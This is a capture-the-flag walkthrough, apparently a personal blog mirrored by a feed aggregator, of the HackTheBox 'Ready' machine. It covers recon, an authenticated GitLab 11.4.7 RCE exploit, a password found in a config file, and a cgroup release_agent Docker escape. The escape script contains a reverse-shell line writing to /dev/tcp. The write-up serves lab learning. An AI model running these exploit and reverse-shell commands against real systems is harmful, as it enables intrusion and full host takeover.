惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
Check Point Blog
GbyAI
GbyAI
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
U
Unit 42
美团技术团队
NISL@THU
NISL@THU
C
Cisco Blogs
SecWiki News
SecWiki News
N
Netflix TechBlog - Medium
Forbes - Security
Forbes - Security
Cloudbric
Cloudbric
雷峰网
雷峰网
T
Tailwind CSS Blog
博客园 - 司徒正美
The Register - Security
The Register - Security
L
LangChain Blog
S
Security Affairs
Hacker News - Newest:
Hacker News - Newest: "LLM"
B
Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
T
Threat Research - Cisco Blogs
I
InfoQ
S
Schneier on Security
L
Lohrmann on Cybersecurity
量子位
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Martin Fowler
Martin Fowler
Schneier on Security
Schneier on Security
F
Fortinet All Blogs
TaoSecurity Blog
TaoSecurity Blog
K
Kaspersky official blog
Google DeepMind News
Google DeepMind News
Cisco Talos Blog
Cisco Talos Blog
PCI Perspectives
PCI Perspectives
Attack and Defense Labs
Attack and Defense Labs
WordPress大学
WordPress大学
Microsoft Azure Blog
Microsoft Azure Blog
H
Help Net Security
Project Zero
Project Zero
The GitHub Blog
The GitHub Blog
D
Docker
N
News | PayPal Newsroom
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
H
Hacker News: Front Page
云风的 BLOG
云风的 BLOG
Microsoft Security Blog
Microsoft Security Blog
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 聂微东
Webroot Blog
Webroot Blog
MongoDB | Blog
MongoDB | Blog

Homepage on Aditya Telange

One Year with evil-winrm-py - A Retrospective Bypassing LinkedIn's Connection Privacy with a Simple Search Filter Making Dynamic Instrumentation Accessible with Frida UI Breaking Payload Encryption in Web Applications HackTheBox (HTB) - Escape HackTheBox (HTB) - Resolute HackTheBox (HTB) - Certified State of VMWare Workstation (Pro?) on Linux Android App Security Testing Lab with MobSleuth Android phone as a Webcam on Linux Breaking down Reverse shell commands HackTheBox (HTB) - Photobomb Merging AOSP Security Patches into Custom ROMs Primer on HTTP Security Headers Image Zoom-In effect with HUGO HackTheBox (HTB) - Legacy HackTheBox (HTB) - Lame Cryptohack - Keyed Permutations [5 pts] Cryptohack - Resisting Bruteforce [10 pts] Cryptohack - RSA Starter 1 [10 pts] Cryptohack - Base64 [10 pts] Cryptohack - Bytes and Big Integers [10 pts] Cryptohack - Hex [5 pts] Cryptohack- XOR Starter [10 pts] HackTheBox (HTB) - Horizontall HackTheBox (HTB) - Forge HackTheBox (HTB) - Previse HackTheBox (HTB) - BountyHunter HackTheBox (HTB) - Explore HackTheBox (HTB) - Cap HackTheBox (HTB) - Pit HackTheBox (HTB) - Knife HackTheBox (HTB) - Love HackTheBox (HTB) - Tenet Watermarking images with HUGO My Github Project went viral! Cryptohack - ASCII [5 pts] Cryptohack - Finding Flags [2 pts] Cryptohack - Great Snakes [3 pts] Cryptohack - JWT Sessions [10 pts] Cryptohack - Network Attacks [5 pts] Cryptohack - Token Appreciation [5 pts] CAF's Android for MSM Basic Website Analytics with Vercel Github Actions as Temporary File Sharing Platform Addition of prebuilt APK - AOSP Rom Development External Link With target='_blank' in Hugo Markdown Setting Up Build Environment - AOSP Rom Development Getting Started - AOSP Rom Development Using Secure HTTP Headers with Vercel/Zeit Education and Certifications Link Tree ↟ | Aditya Telange Personal Projects Resume - Aditya Telange Security Acknowledgements About Me Graph View License Privacy Policy
HackTheBox (HTB) - Ready
[Aditya Telange](https://x.com/adityatelange) · 2021-05-15 · via Homepage on Aditya Telange
Box Info
  • Name: Ready
  • OS: Linux
  • Difficulty: Medium
  • IP: 10.10.10.220
  • Points: 30
  • Machine Creator: bertolis

Introduction

Ready is a fun box which is using an outdated GitLab community version. Which apparently has an exploit which gives RCE to authenticated users.

This RCE gives access to docker container in which gitlab instance is running, and we have to breakout the container to escalate our privilages to get own root!


Reconnaissance

NMAP Scan

NMAP scan shows us port 22 and 5080 are open.

# Nmap 7.80 scan initiated Wed May 12 07:40:38 2021 as: nmap -sC -sV -oA nmap 10.10.10.220
Nmap scan report for 10.10.10.220
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 12 07:41:13 2021 -- 1 IP address (1 host up) scanned in 35.21 seconds

We also get the following paths on http://ready.htb:5080/

/ /autocomplete/users /search /api /admin /profile
/dashboard /projects/new /groups/new /groups/*/edit /users /help

Visiting ready.htb:5080

We visit the website on port 5080. We see a gitlab instance running here.

We get see the help section and try to fetch the instance config at http://ready.htb:5080/help/instance_configuration

But we get a 500 error saying Whoops, GitLab is taking too much time to respond.

So we got no public repo or activity.

Running DIRB

---- Scanning URL: http://ready.htb:5080/ ----
+ http://ready.htb:5080/aaa (CODE:200|SIZE:15715)
+ http://ready.htb:5080/explore (CODE:200|SIZE:13334)
+ http://ready.htb:5080/favicon.ico (CODE:301|SIZE:171)
+ http://ready.htb:5080/groups (CODE:302|SIZE:102)
+ http://ready.htb:5080/help (CODE:200|SIZE:37961)
+ http://ready.htb:5080/projects (CODE:302|SIZE:95)
+ http://ready.htb:5080/public (CODE:200|SIZE:13413)
+ http://ready.htb:5080/robots.txt (CODE:200|SIZE:2095)
+ http://ready.htb:5080/root (CODE:200|SIZE:15793)
+ http://ready.htb:5080/Root (CODE:302|SIZE:92)
+ http://ready.htb:5080/search (CODE:200|SIZE:12684)
+ http://ready.htb:5080/snippets (CODE:302|SIZE:104)

-----------------
END_TIME: Wed May 12 09:57:14 2021
DOWNLOADED: 4612 - FOUND: 12

DIRB gave nothing but 2 users on the box with usernamesaaa and root

Creating an account on ready.htb:5080

We create an account to discover further

full name: foo bar
username: foo
email: foo@ready.htb
pass: foo@ready.htb

Now we can see the GitLab Version i.e. 11.4.7


Getting USER flag

We find an exploit https://www.exploit-db.com/exploits/49334

# we download the exploit
$ curl -o 49334.py https://www.exploit-db.com/download/49334

Start a netcat lister on port 1234

The run the exploit!

$ python3 49334.py -u foo@ready.htb -p foo@ready.htb -g http://ready.htb -l 10.10.xx.xx -P 1234

[+] authenticity_token: vcD5H1eZJuCvfACU2YgNIdJ1XVDZc/KXltGafZCRctag7Y9XM/Q6h9vMnpSh+c42mBf6FHlWmFqskd85wiP1Ug==
[+] Creating project with random name: project3656
[+] Running Exploit
[+] Exploit completed successfully!

# usage
: '
-u  : username
-p  : password
-g  : gitlab URL
-l  : host IP/reverse shell IP
-P  : host port/reverse shell port
'

We get shell when user git

Upgrading the shell 1

# In reverse shell

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali

$ stty raw -echo
$ fg

On exploring the /home dir

We see that, there is another user - “dude”, where we get user.txt under /home/dude/user.txt

In /opt/backup/ we have few interesing config files.

git@gitlab:/opt/backup$ ls
docker-compose.yml  gitlab-secrets.json  gitlab.rb
  • docker-compose.yml has no secrets.

  • gitlab-secrets.json has 3 RSA keys and certificates. I tried using these to login to root via SSH(as port 22 of ready is open) but no luck!

  • gitlab.rb does have a lot of stuff in it. Of which most of the stuff is commented.

    So we use grep to find out what is not commented:

    git@gitlab:/opt/backup$ cat gitlab.rb | grep "^[^#;]"
    gitlab_rails['smtp_password'] = "wW59U!Z█████████"
    

    …and we get a password.

This fortunately is the root pass \o/

git@gitlab:/opt/backup$ su # type/paste the password we got.
Password:
root@gitlab:/opt/backup#

We get root!! But unfortunately there is no /root/root.txt. And thus this is the container’s root. This is also a hint as the shell says root@gitlab:~# and not root@ready:~#.

So now we know we are under gitlab’s docker container!

Getting ROOT flag

Searching https://book.hacktricks.xyz/ as always… I got how we can escape docker container if the docker socket is mounted.

You can read more about it here: https://github.com/carlospolop/hacktricks/blob/master/linux-unix/privilege-escalation/docker-breakout.md

We use the following code following insructions here https://github.com/carlospolop/hacktricks/blob/master/linux-unix/privilege-escalation/docker-breakout.md#i-own-root

Start a netcat lister on port 9000

Then running the following commands

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.xx.xx/9000 0>&1" >> /cmd
chmod a+x /cmd
# start a nc lister here
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

we get root@ready!!!